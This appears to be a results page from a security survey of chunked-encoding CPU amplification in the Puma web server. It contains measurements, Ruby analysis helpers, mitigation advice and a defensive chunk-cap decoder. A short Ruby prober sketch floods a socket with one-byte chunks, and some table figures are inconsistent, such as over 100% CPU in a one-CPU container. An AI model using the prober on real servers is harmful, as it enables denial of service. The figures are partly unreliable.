chunkloris: puma

published: May 22, 2026

part of the chunkloris per-chunk amplification survey. this page is the per-server record for puma under http/1.1 chunked transfer encoding.

at a glance

  • server: puma 6.4.3
  • runtime: ruby-3.3.11
  • ecosystem: ruby
  • concurrency model: reactor-thread + threaded-workers (8)
  • parser: Puma pure-Ruby chunked decoder (Puma::Client#decode_chunk, lib/puma/client.rb)
  • delivery granularity: fully-buffered-tempfile-to-handler
  • chunk-limit helper: none exposed by the framework
  • verdict: per-chunk. the parser/dispatcher boundary delivers one event per wire chunk, and cpu cost under paced mode b is measurable per chunk.
  • scaling exponent (mode a): 1.00 (wall time vs N, log-log slope across common cells)
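the scaling exponent is the slope of a straight-line fit of ln(wall) against ln(N). a minimal ruby sketch of that fit follows, assuming ordinary least squares. the helper name log_log_slope is hypothetical, and because this page does not spell out which cells count as "common", the function simply fits whatever [N, wall] pairs it is given.

```ruby
# Hypothetical helper: ordinary least-squares slope of ln(wall) vs ln(N).
# A slope of 1.0 means wall time grows linearly with the number of chunks.
def log_log_slope(cells)
  raise ArgumentError, "need at least two [n, wall] cells" if cells.size < 2

  xs = cells.map { |n, _wall| Math.log(n) }
  ys = cells.map { |_n, wall| Math.log(wall) }
  mean_x = xs.sum / xs.size
  mean_y = ys.sum / ys.size

  covariance = xs.zip(ys).sum { |x, y| (x - mean_x) * (y - mean_y) }
  variance = xs.sum { |x| (x - mean_x)**2 }
  covariance / variance
end

# Mode-a cells from the measurements table: [N, wall seconds].
mode_a = [[50_000, 0.055], [100_000, 0.110], [250_000, 0.306]]
puts log_log_slope(mode_a.first(2)).round(2)
puts log_log_slope(mode_a).round(2)
```

fitting only the 50,000 and 100,000 mode-a cells gives 1.0; adding the 250,000 mode-a cell (whose µs/chunk basis is wall time) moves the fit to about 1.07, so the reported exponent depends on which cells are included.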

measurements

all cells were run in a 1-vcpu docker container. cpu cost is derived from the target container’s cgroup v2 cpu.stat usage_usec delta around each cell.

mode               | N       | wall (s) | server cpu % | µs / chunk | basis               | ok
A-bridge-coalesced | 50,000  | 0.055    | 152.8        | 1.674      | server-cpu-cgroup   | ✓
A-bridge-coalesced | 100,000 | 0.110    | 128.7        | 1.410      | server-cpu-cgroup   | ✓
A-bridge-coalesced | 250,000 | 0.306    | n/a          | 1.220      | wall                | ✓
B-paced-100us      | 50,000  | 5.124    | 8.5          | 8.702      | server-cpu-cgroup   | ✓
B-paced-100us      | 100,000 | 10.245   | 8.1          | 8.271      | server-cpu-cgroup   | ✓
B-paced-100us      | 250,000 | 26.110   | 27.7         | 28.900     | server-cpu-overhead | ✓
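the cgroup-basis rows are consistent with server cpu % = Δusage_usec / wall time and µs / chunk = Δusage_usec / N. for example, 1.674 µs × 50,000 chunks ≈ 83.7 ms of cpu over roughly 0.055 s of wall, about 152%, which matches the first row within the rounding of the wall column. the ruby sketch below assumes those two formulas (inferred from the table, not taken from the paper's scripts) and the flat key/value layout of the cgroup v2 cpu.stat file; usage_usec and cell_metrics are hypothetical names.

```ruby
# Hypothetical helpers: derive the "server cpu %" and "µs / chunk" columns
# from two snapshots of a cgroup v2 cpu.stat file taken around one cell.
# The formulas are inferred from the table, not copied from the paper's scripts.

# cpu.stat is a flat "key value" file, e.g. "usage_usec 1234\nuser_usec 1000\n...".
def usage_usec(cpu_stat_text)
  line = cpu_stat_text.each_line.find { |l| l.start_with?("usage_usec ") }
  raise ArgumentError, "cpu.stat has no usage_usec field" unless line

  Integer(line.split[1])
end

# Returns [server cpu %, µs per chunk] for one measurement cell.
def cell_metrics(before_text, after_text, wall_s, n_chunks)
  delta_usec = usage_usec(after_text) - usage_usec(before_text)
  cpu_pct = 100.0 * delta_usec / (wall_s * 1_000_000)
  us_per_chunk = delta_usec.to_f / n_chunks
  [cpu_pct, us_per_chunk]
end

# Usage with made-up snapshots chosen to match the first mode-a row.
before = "usage_usec 1000\nuser_usec 800\nsystem_usec 200\n"
after  = "usage_usec 84700\nuser_usec 70000\nsystem_usec 14700\n"
pct, per_chunk = cell_metrics(before, after, 0.055, 50_000)
puts format("%.1f%% cpu, %.3f us/chunk", pct, per_chunk)
```

in a real run the two snapshots would be read from the target container's cpu.stat immediately before and after a cell; where that file lives on the host depends on the docker cgroup driver, so treat any path as an assumption.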

parser path: source citations

  • chunked-decoder: lib/puma/client.rb:526-630 (decode_chunk)
  • reactor-read-loop: lib/puma/client.rb:478-501 (read_chunked_body)
  • tempfile-body: lib/puma/client.rb:504-517 (setup_chunked_body)

what this means

the parser/dispatcher path on this server delivers one event per chunked-transfer-encoding chunk, so an attacker who sends a body as N one-byte chunks consumes roughly N × (mode-b µs/chunk) of server cpu time on a single core. at the measured 8.271 µs/chunk, for example, 100,000 one-byte chunks cost about 0.83 s of cpu. amplification scales linearly with N until the framework’s max_request_body_size (or equivalent) is hit.
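as a back-of-envelope check of that linear model, the sketch below estimates the wire bytes an attacker sends and the server cpu a one-byte-chunk body costs. it assumes each chunk is framed as "1\r\nX\r\n" (6 bytes on the wire) plus a 5-byte "0\r\n\r\n" terminator, takes µs/chunk from a mode-b row, and assumes a body-size limit, if present, counts decoded bytes, so with one-byte chunks it caps the number of chunks processed. attack_estimate and its body_limit_bytes keyword are hypothetical.

```ruby
# Hypothetical back-of-envelope model for a body sent as N one-byte chunks.
# Each chunk is framed as "1\r\n<byte>\r\n"; the body ends with "0\r\n\r\n".
CHUNK_WIRE_BYTES = "1\r\nx\r\n".bytesize      # 6 bytes per one-byte chunk
TERMINATOR_WIRE_BYTES = "0\r\n\r\n".bytesize  # 5 bytes for the last-chunk marker

# us_per_chunk: server cpu cost per chunk, e.g. a mode-b µs/chunk figure.
# body_limit_bytes: optional decoded-body limit (assumption); with one-byte
# chunks it caps how many chunks the server processes.
def attack_estimate(n_chunks, us_per_chunk, body_limit_bytes: nil)
  processed = body_limit_bytes ? [n_chunks, body_limit_bytes].min : n_chunks
  {
    chunks_sent: n_chunks,
    wire_bytes: n_chunks * CHUNK_WIRE_BYTES + TERMINATOR_WIRE_BYTES,
    chunks_processed: processed,
    cpu_seconds: processed * us_per_chunk / 1_000_000.0
  }
end

# 100,000 one-byte chunks at the measured 8.271 µs/chunk (mode b).
p attack_estimate(100_000, 8.271)
```

the ratio of cpu_seconds to wire_bytes is the amplification this page describes; a body limit only bounds it if the limit is enforced while chunks are being decoded rather than after.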

what to do today

  • if this server runs as an origin behind nginx with the default proxy_request_buffering on, the per-chunk attack shape does not reach this server: nginx buffers the full body and forwards it upstream framed by content-length, so the client's chunk boundaries never reach puma.
  • if it is exposed directly, sits behind haproxy with default streaming, or sits behind any reverse proxy with request buffering disabled (e.g. nginx with proxy_request_buffering off), the per-chunk cost reaches this server.
  • there is no framework-level chunk-count limit in the default config; use a frontend buffer, transport-layer rate limiting, or a wrapping middleware that imposes a chunk-count cap before draining the body.
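one caveat for puma specifically: since puma hands the handler a fully buffered body, a rack middleware inside the app only sees that body after the per-chunk decode cost has already been paid, so a chunk-count cap has to sit in a layer that still sees the raw chunk framing (a frontend, or a wrapper around the server's read path). the ruby sketch below shows the shape of such a cap over an IO of raw chunked bytes. read_chunked_capped and ChunkLimitExceeded are hypothetical names, and this is not puma's decode_chunk.

```ruby
require "stringio"

# Hypothetical chunk-count guard for a layer that reads raw chunked framing.
class ChunkLimitExceeded < StandardError; end

# Decodes an HTTP/1.1 chunked body from io, raising ChunkLimitExceeded as soon
# as more than max_chunks data chunks arrive. Chunk extensions (";k=v") are
# ignored and trailer lines are read and discarded.
def read_chunked_capped(io, max_chunks:)
  body = String.new # binary (ASCII-8BIT) buffer
  chunks = 0
  loop do
    size_line = io.gets("\r\n") or raise EOFError, "truncated chunk-size line"
    hex = size_line.split(";", 2).first.strip
    raise ArgumentError, "bad chunk size #{hex.inspect}" unless hex.match?(/\A\h+\z/)

    size = hex.to_i(16)
    if size.zero?
      # Last chunk: skip optional trailer fields up to the terminating blank line.
      while (line = io.gets("\r\n")) && line != "\r\n"
      end
      return body
    end

    # Count the chunk before reading its data, so the cap trips early.
    chunks += 1
    raise ChunkLimitExceeded, "more than #{max_chunks} chunks" if chunks > max_chunks

    data = io.read(size)
    raise EOFError, "truncated chunk data" unless data && data.bytesize == size

    body << data
    raise ArgumentError, "missing CRLF after chunk data" unless io.read(2) == "\r\n"
  end
end

p read_chunked_capped(StringIO.new("1\r\na\r\n1\r\nb\r\n0\r\n\r\n"), max_chunks: 10)
```

the cap is checked per chunk rather than per byte, which is the point: a body of N one-byte chunks is rejected after max_chunks iterations instead of after N.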

reproducer

the full reproducer for this server is in the paper repo. the docker setup pins puma 6.4.3 and constrains the test container to a single cpu (--cpus=1). the prober script implements mode a (bridge-coalesced) and mode b (paced 100 µs) per the methodology section.
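for orientation only, the two send patterns can be sketched in ruby as below. this is not the paper's prober: request_head, chunk_frames and send_body are hypothetical, mode a is modelled as one large write (our reading of "bridge-coalesced" is that segment coalescing is left to the docker bridge and tcp stack), and mode b issues one write per chunk with a sleep of about 100 µs between writes. Kernel#sleep may overshoot such a short period depending on the os timer, so a real prober may need tighter pacing.

```ruby
require "socket"
require "stringio"

# Hypothetical prober sketch (not the paper's script).
def request_head(host, path)
  "POST #{path} HTTP/1.1\r\nHost: #{host}\r\nTransfer-Encoding: chunked\r\n\r\n"
end

# n one-byte chunks followed by the last-chunk marker.
def chunk_frames(n)
  Array.new(n) { "1\r\nx\r\n" } << "0\r\n\r\n"
end

# mode :coalesced -> one write of the whole body (mode a)
# mode :paced     -> one write per chunk, ~pace_s apart (mode b)
def send_body(io, n, mode:, pace_s: 100e-6)
  frames = chunk_frames(n)
  case mode
  when :coalesced
    io.write(frames.join)
  when :paced
    frames.each do |frame|
      io.write(frame)
      io.flush
      sleep(pace_s) # may overshoot 100 µs depending on the OS timer
    end
  else
    raise ArgumentError, "unknown mode #{mode.inspect}"
  end
  io.flush
end

# Dry run into memory; against a server, pass a TCPSocket instead, e.g.
#   sock = TCPSocket.new("127.0.0.1", 9292)  # host/port are placeholders
#   sock.write(request_head("127.0.0.1", "/")); send_body(sock, 50_000, mode: :paced)
buf = StringIO.new
buf.write(request_head("localhost", "/"))
send_body(buf, 3, mode: :coalesced)
puts buf.string.bytesize
```

both modes put identical bytes on the wire; only the write pattern differs, which is what separates the coalesced (mode a) and paced (mode b) rows in the table.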

see the draft pdf for the full per-framework discussion.
